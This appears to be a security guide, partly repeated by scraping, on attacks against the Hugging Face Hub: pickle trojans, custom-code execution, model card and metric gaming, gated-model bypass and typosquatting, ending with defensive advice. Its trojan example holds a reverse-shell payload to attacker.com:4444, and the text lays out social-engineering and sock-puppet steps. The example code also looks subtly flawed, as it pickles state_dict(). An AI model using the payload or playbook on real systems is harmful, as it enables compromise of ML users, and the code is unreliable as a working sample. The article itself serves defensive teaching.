Hugging Face Hub Security

advanced9 min readUpdated 2026-03-15

Attack surface analysis of Hugging Face Hub: malicious model uploads, pickle deserialization exploits, model card manipulation, trust signal limitations, gated model bypass, and community-driven trust exploitation.

huggingface model-hub pickle deserialization trust-signals gated-models malicious-uploads

Hugging Face Hub Security

Hugging Face Hub is the dominant distribution platform for ML models, serving as the de facto package registry for the ML community. With millions of models hosted and billions of monthly downloads, it occupies the same trust position for ML that npm holds for JavaScript or PyPI for Python -- except that ML artifacts can contain executable code by design. The Hub's community-driven model means that anyone can upload a model, and the trust signals that users rely on are largely cosmetic.

Malicious Model Uploads

Attack Vectors

The Hub supports multiple model formats, each with different risk profiles:

Format	Risk Level	Attack Vector
Pickle (.pkl, .pt, .bin)	Critical	Arbitrary code execution on deserialization
*Custom code (modeling_.py)**	Critical	Arbitrary Python execution when `trust_remote_code=True`
Tokenizer (tokenizer.py)	High	Code execution through custom tokenizer loading
ONNX	Medium	Potential for custom operator exploitation
Safetensors	Low	Weight-only format, no executable code
GGUF	Low	Metadata fields could be crafted, but no code execution

Pickle-Based Attacks

PyTorch models saved with torch.save() use Python's pickle serialization, which executes arbitrary code during deserialization. An attacker can embed code that runs when a user calls torch.load() or when the transformers library loads the model.

Craft a trojanized model

Create a model that functions normally but executes a payload during loading. The payload runs before the model is usable, making it invisible to functional testing.

import torch
import torch.nn as nn
 
class TrojanModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(768, 768)
 
    def __reduce__(self):
        # Payload executes during deserialization
        import subprocess
        return (
            exec,
            ("import subprocess; subprocess.Popen(['bash', '-c', "
             "'bash -i >& /dev/tcp/attacker.com/4444 0>&1'])",),
        )
 
# Save looks like a normal model checkpoint
model = TrojanModel()
torch.save(model.state_dict(), "pytorch_model.bin")

Create a convincing repository
Upload the model with a professional model card, realistic training metrics, and a plausible name. Include legitimate-looking configuration files to pass casual inspection.
Promote through social engineering
Share the model on ML forums, reference it in discussions, and create derivative models that link back to the original. Build apparent legitimacy through community engagement.

Custom Code Execution

The trust_remote_code=True parameter is required to load models with custom architectures. When set, the transformers library downloads and executes arbitrary Python files from the model repository.

Files that can execute code:

modeling_*.py -- Custom model architecture definitions
configuration_*.py -- Custom configuration classes
tokenization_*.py -- Custom tokenizer implementations
image_processing_*.py -- Custom image processors
Any file referenced in config.json via auto_map

Model Card Manipulation

Model cards serve as the primary documentation and trust signal for Hub models. They are rendered Markdown files that appear on the model's page and influence user decisions.

Manipulation Techniques

Performance inflation. Report inflated benchmark scores in the model card. Users compare models by their self-reported metrics, so inflated numbers drive downloads.

Provenance fabrication. Claim the model is fine-tuned from a trusted base model (e.g., "Fine-tuned from Llama 3") to inherit trust by association. No verification mechanism confirms this claim.

Malicious links. Embed links to external resources (documentation, notebooks, demo sites) that serve malware or phishing pages. Model cards support full Markdown including links, images, and HTML in some contexts.

Misleading safety claims. Claim the model has been safety-tested, RLHF-aligned, or certified by an organization. These claims are not verified by the platform.

Metadata Gaming

Model card YAML frontmatter controls how models appear in Hub search and filtering:

---
license: mit
datasets:
  - wikipedia  # May not actually be the training data
metrics:
  - accuracy: 0.95  # Self-reported, unverified
tags:
  - text-generation
  - safe  # Unverified claim
  - production-ready  # Unverified claim
---

Trust Signals and Their Limitations

Organization Badges

Hugging Face verifies organization identities, displaying a badge on their profile. However:

Verification confirms identity, not artifact security
Organization members can publish without per-model review
Compromised organization accounts retain the badge
Users equate "verified organization" with "safe model"

Community Engagement Metrics

Metric	Intended Signal	Gaming Method
Downloads	Popularity	Automated download scripts
Likes	Community endorsement	Coordinated liking campaigns
Spaces	Active usage	Create derivative Spaces referencing the model
Discussions	Community engagement	Sock puppet accounts asking positive questions

Malware Scanning

Hugging Face runs automated security scanning on uploaded files:

Pickle scanning detects known malicious patterns in serialized files
The scanner checks for suspicious __reduce__ implementations
Custom code files are flagged for manual review

Scanner limitations:

Novel payloads bypass pattern-matching detection
Obfuscated code in custom Python files evades static analysis
Multi-stage payloads where the initial loader fetches the real payload at runtime
Scanner updates lag behind new attack techniques

Gated Model Bypass

Gated models require users to accept terms of use or request access before downloading. This mechanism is intended for license compliance and access control.

Bypass Techniques

Token sharing. A user with approved access shares their Hugging Face token, granting others access to gated models without going through the approval process.

API direct access. Gated model files are stored in the same infrastructure as public models. If the access control is implemented at the API layer rather than the storage layer, direct storage URLs may bypass gating.

Derivative models. Download a gated model through approved access, then re-upload the weights to a new, ungated repository. The original model's license may prohibit this, but technical controls do not prevent it.

Cached copies. Gated models downloaded by CI/CD systems are often cached in artifact stores, container images, or shared filesystems without gating controls. The gate applies at download time, not at usage time.

Supply Chain Attack Scenarios

Scenario 1: Typosquatting

An attacker registers meta-Ilama/Llama-3-8B (capital I instead of lowercase L). Users who mistype the repository name download and load the attacker's model, which contains a pickle payload. The model card is a copy of the legitimate model's card with identical metrics.

Scenario 2: Dependency Chain Poisoning

An attacker creates a seemingly useful adapter (LoRA weights) that references a base model. When users load the adapter, it pulls the base model from the attacker's repository rather than the intended source. The adapter works correctly, but the base model contains a backdoor.

Scenario 3: Abandoned Repository Takeover

Popular models are sometimes created by individual researchers who later abandon their accounts. An attacker could attempt to gain control of abandoned accounts (password reuse, email provider compromise) and update the model files with poisoned versions. Existing download links and references still point to the same repository.

Defensive Recommendations

For Model Consumers

Verify repository names character by character before downloading
Use safetensors format exclusively when available; reject pickle-based models
Never set trust_remote_code=True for models from untrusted sources
Pin to specific commits rather than branch references
Verify hashes of downloaded files against known-good values
Scan model files with tools like fickling before loading

For Organizations Publishing Models

Use safetensors for all model weight storage
Sign model artifacts with Sigstore or similar
Enable branch protection on the Hub repository
Monitor for typosquat repositories of your models
Implement access logging for gated models

For Platform Security

Expand malware scanning to cover custom code files and configuration-based attacks
Implement mandatory signing for organization-published models
Enforce namespace reservation for well-known model families
Provide provenance attestation for the training process, not just the upload

References

Hugging Face Security -- Platform security documentation
Safetensors -- Safe model serialization format
Fickling -- Pickle security analysis tool
JFrog ML Model Security Research -- Analysis of malicious Hub models

Knowledge Check

A model repository on Hugging Face Hub has a verified organization badge, 50,000 downloads, and uses safetensors format. The config.json includes 'auto_map' pointing to custom modeling code. Is this model safe to load with trust_remote_code=True?

Edit this page on GitHub

Hugging Face Hub Security

advanced9 min readUpdated 2026-03-15

huggingface model-hub pickle deserialization trust-signals gated-models malicious-uploads

Hugging Face Hub Security

Malicious Model Uploads

Attack Vectors

The Hub supports multiple model formats, each with different risk profiles:

Format	Risk Level	Attack Vector
Pickle (.pkl, .pt, .bin)	Critical	Arbitrary code execution on deserialization
*Custom code (modeling_.py)**	Critical	Arbitrary Python execution when `trust_remote_code=True`
Tokenizer (tokenizer.py)	High	Code execution through custom tokenizer loading
ONNX	Medium	Potential for custom operator exploitation
Safetensors	Low	Weight-only format, no executable code
GGUF	Low	Metadata fields could be crafted, but no code execution

Pickle-Based Attacks

Craft a trojanized model

Create a model that functions normally but executes a payload during loading. The payload runs before the model is usable, making it invisible to functional testing.

import torch
import torch.nn as nn
 
class TrojanModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(768, 768)
 
    def __reduce__(self):
        # Payload executes during deserialization
        import subprocess
        return (
            exec,
            ("import subprocess; subprocess.Popen(['bash', '-c', "
             "'bash -i >& /dev/tcp/attacker.com/4444 0>&1'])",),
        )
 
# Save looks like a normal model checkpoint
model = TrojanModel()
torch.save(model.state_dict(), "pytorch_model.bin")

Create a convincing repository
Upload the model with a professional model card, realistic training metrics, and a plausible name. Include legitimate-looking configuration files to pass casual inspection.
Promote through social engineering
Share the model on ML forums, reference it in discussions, and create derivative models that link back to the original. Build apparent legitimacy through community engagement.

Custom Code Execution

Files that can execute code:

modeling_*.py -- Custom model architecture definitions
configuration_*.py -- Custom configuration classes
tokenization_*.py -- Custom tokenizer implementations
image_processing_*.py -- Custom image processors
Any file referenced in config.json via auto_map

Model Card Manipulation

Model cards serve as the primary documentation and trust signal for Hub models. They are rendered Markdown files that appear on the model's page and influence user decisions.

Manipulation Techniques

Performance inflation. Report inflated benchmark scores in the model card. Users compare models by their self-reported metrics, so inflated numbers drive downloads.

Provenance fabrication. Claim the model is fine-tuned from a trusted base model (e.g., "Fine-tuned from Llama 3") to inherit trust by association. No verification mechanism confirms this claim.

Misleading safety claims. Claim the model has been safety-tested, RLHF-aligned, or certified by an organization. These claims are not verified by the platform.

Metadata Gaming

Model card YAML frontmatter controls how models appear in Hub search and filtering:

---
license: mit
datasets:
  - wikipedia  # May not actually be the training data
metrics:
  - accuracy: 0.95  # Self-reported, unverified
tags:
  - text-generation
  - safe  # Unverified claim
  - production-ready  # Unverified claim
---

Trust Signals and Their Limitations

Organization Badges

Hugging Face verifies organization identities, displaying a badge on their profile. However:

Verification confirms identity, not artifact security
Organization members can publish without per-model review
Compromised organization accounts retain the badge
Users equate "verified organization" with "safe model"

Community Engagement Metrics

Metric	Intended Signal	Gaming Method
Downloads	Popularity	Automated download scripts
Likes	Community endorsement	Coordinated liking campaigns
Spaces	Active usage	Create derivative Spaces referencing the model
Discussions	Community engagement	Sock puppet accounts asking positive questions

Malware Scanning

Hugging Face runs automated security scanning on uploaded files:

Pickle scanning detects known malicious patterns in serialized files
The scanner checks for suspicious __reduce__ implementations
Custom code files are flagged for manual review

Scanner limitations:

Novel payloads bypass pattern-matching detection
Obfuscated code in custom Python files evades static analysis
Multi-stage payloads where the initial loader fetches the real payload at runtime
Scanner updates lag behind new attack techniques

Verify repository names character by character before downloading
Use safetensors format exclusively when available; reject pickle-based models
Never set trust_remote_code=True for models from untrusted sources
Pin to specific commits rather than branch references
Verify hashes of downloaded files against known-good values
Scan model files with tools like fickling before loading

For Organizations Publishing Models

Use safetensors for all model weight storage
Sign model artifacts with Sigstore or similar
Enable branch protection on the Hub repository
Monitor for typosquat repositories of your models
Implement access logging for gated models

For Platform Security

Expand malware scanning to cover custom code files and configuration-based attacks
Implement mandatory signing for organization-published models
Enforce namespace reservation for well-known model families
Provide provenance attestation for the training process, not just the upload

References

Hugging Face Security -- Platform security documentation
Safetensors -- Safe model serialization format
Fickling -- Pickle security analysis tool
JFrog ML Model Security Research -- Analysis of malicious Hub models

Knowledge Check

Edit this page on GitHub

Hugging Face Hub Security

Craft a trojanized model

Create a convincing repository

Promote through social engineering

Related articles

Hugging Face Hub Security

Craft a trojanized model

Create a convincing repository

Promote through social engineering

Related articles